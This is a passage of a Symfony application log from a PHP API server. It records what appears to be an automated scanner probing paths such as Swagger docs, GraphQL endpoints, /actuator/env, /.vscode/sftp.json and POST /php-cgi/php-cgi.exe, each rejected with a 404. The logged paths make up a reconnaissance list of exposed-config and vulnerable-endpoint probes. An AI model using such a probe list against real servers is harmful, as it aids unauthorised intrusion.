  942. [2025-12-16 17:01:09] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /graphql/api"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /graphql/api\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  943. [2025-12-16 17:01:09] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/gql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/gql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  944. [2025-12-16 17:01:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger-ui.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger-ui.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  945. [2025-12-16 17:01:11] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  946. [2025-12-16 17:01:12] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/swagger-ui.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/swagger-ui.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  947. [2025-12-16 17:01:13] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /webjars/swagger-ui/index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /webjars/swagger-ui/index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  948. [2025-12-16 17:01:14] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
  949. [2025-12-16 17:01:14] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  950. [2025-12-16 17:01:14] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  951. [2025-12-16 17:01:14] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  952. [2025-12-16 17:01:14] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  953. [2025-12-16 17:01:14] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  954. [2025-12-16 17:01:14] security.DEBUG: Calling Authentication entry point. [] []
  955. [2025-12-16 17:01:14] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
  956. [2025-12-16 17:01:14] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  957. [2025-12-16 17:01:14] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  958. [2025-12-16 17:01:14] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  959. [2025-12-16 17:01:14] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  960. [2025-12-16 17:01:14] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  961. [2025-12-16 17:01:14] security.DEBUG: Calling Authentication entry point. [] []
  962. [2025-12-16 17:01:14] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  963. [2025-12-16 17:01:15] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /graphql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /graphql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  964. [2025-12-16 17:01:15] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/v1/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/v1/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  965. [2025-12-16 17:01:16] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  966. [2025-12-16 17:01:16] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/graphql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/graphql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  967. [2025-12-16 17:01:16] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v2/api-docs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v2/api-docs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  968. [2025-12-16 17:01:17] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /graphql/api"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /graphql/api\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  969. [2025-12-16 17:01:17] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v3/api-docs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v3/api-docs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  970. [2025-12-16 17:01:17] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/gql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/gql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  971. [2025-12-16 17:01:18] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api-docs/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api-docs/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  972. [2025-12-16 17:01:19] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger-ui.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger-ui.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  973. [2025-12-16 17:01:19] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  974. [2025-12-16 17:01:20] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  975. [2025-12-16 17:01:20] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /@vite/env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /@vite/env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  976. [2025-12-16 17:01:21] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/swagger-ui.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/swagger-ui.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  977. [2025-12-16 17:01:21] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /actuator/env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /actuator/env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  978. [2025-12-16 17:01:22] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /webjars/swagger-ui/index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /webjars/swagger-ui/index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  979. [2025-12-16 17:01:22] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /php-cgi/php-cgi.exe"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /php-cgi/php-cgi.exe\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  980. [2025-12-16 17:01:23] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  981. [2025-12-16 17:01:23] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /server"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /server\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  982. [2025-12-16 17:01:24] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/v1/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/v1/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  983. [2025-12-16 17:01:24] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.vscode/sftp.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.vscode/sftp.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  984. [2025-12-16 17:01:25] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v2/api-docs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v2/api-docs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  985. [2025-12-16 17:01:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v3/api-docs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v3/api-docs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  986. [2025-12-16 17:01:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /about"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /about\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  987. [2025-12-16 17:01:27] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api-docs/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api-docs/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  988. [2025-12-16 17:01:27] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /debug/default/view"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /debug/default/view\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  989. [2025-12-16 17:01:28] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  990. [2025-12-16 17:01:28] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v2/_catalog"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v2/_catalog\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  991. [2025-12-16 17:01:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /@vite/env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /@vite/env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  992. [2025-12-16 17:01:30] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /actuator/env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /actuator/env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  993. [2025-12-16 17:01:30] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  994. [2025-12-16 17:01:31] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /php-cgi/php-cgi.exe"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /php-cgi/php-cgi.exe\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
